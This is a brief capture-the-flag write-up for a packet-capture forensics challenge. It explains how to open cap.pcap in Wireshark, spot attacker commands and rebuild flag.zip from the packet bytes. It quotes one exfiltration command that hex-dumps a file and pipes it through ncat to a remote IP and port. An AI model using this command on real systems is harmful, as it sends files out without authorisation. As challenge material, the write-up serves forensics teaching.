- Download the attached file
cap.pcap
- To resolve this challenge, I used Wireshark
- Open the downloaded file with Wireshark
- While parsing packets, we can find some commands
- Continue parsing the packets until you find interesting commands and returns:
ls Documents
wich returnsflag.zip
- […] and after
xxd -p Documents/flag.zip | tr -d '\n' | ncat 172.20.20.133 20200
wich returns the file content as bytes
- You can export the packet bytes into a zip file
- Unzip it
- The flag is located into the file
flag.txt